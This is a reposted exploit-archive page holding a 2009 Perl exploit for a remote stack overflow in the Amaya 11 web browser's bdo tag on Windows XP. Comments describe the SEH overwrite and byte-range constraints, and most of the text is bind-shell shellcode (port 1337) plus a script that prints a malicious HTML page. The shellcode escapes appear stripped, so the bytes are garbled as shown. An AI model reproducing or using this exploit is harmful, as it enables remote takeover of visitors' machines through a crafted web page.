Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (xp)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (xp)
# Published : 2009-02-04
# Author : Rob Carter
# Previous Title : ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability
# Next Title : Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (vista)

#!/usr/bin/perl

#####################################################
#
#   Amaya 11 bdo tag remote stack overflow exploit
#
#   author: Rob Carter (cartrel@hotmail.com)
#
#   affects: winxp sp0-3
#
#   this vulnerability only allows hex bytes
#   between 0x01 and 0x7f to get to the stack
#   unchanged. overwrote SEH with compatible addr
#   of a pop pop ret, manipulated eax register
#   with instructions whose opcodes fell within
#   the acceptable range and then used a ret to
#   force eip to another memory range where the
#   payload was still intact, allowing me to use
#   standard metasploit shellcode with no special
#   encoders.
#
#   i was able to get this working in sp2-3 VERY
#   easily because none of amaya's modules were
#   compiled with the /SAFESEH option so i was
#   able to just overwrite SEH with the address
#   of a pop pop ret in wxmsw2_2 (0x02101917) and
#   execution was returned to my shellcode.
#
#   binds a shell to port 1337 of the victim
#
#   $ perl amaya_sploit.pl > pwn.html
#
#   the author is not responsible for any misuse of
#   this code. it is intended for educational
#   purposes only
#
#####################################################

$shellcode =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45".
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49".
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d".
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66".
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61".
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40".
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32".
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6".
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09".
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0".
"x66x68x05x39x66x53x89xe1x95x68xa4x1ax70xc7x57xff".
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53".
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff".
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64".
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89".
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab".
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51".
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53".
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6".
"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0";

$payload = "<bdo dir="".
'A' x 6889 .
"x74x06x41x41".		# jmp short 06
"x17x19x10x02".		# 0x02101917 - pop pop ret in amaya module
"x68x7fx01x01x7f".		# push 7f01017f
"x58".				# pop eax
"x2dx18x69x45x7d".		# sub eax,7a7a0857
"x50".				# push eax
"xc3".				# retn
"x90" x 100 .
$shellcode.
"">pwnd!</bdo>";

print $payload;

# www.Syue.com [2009-02-04]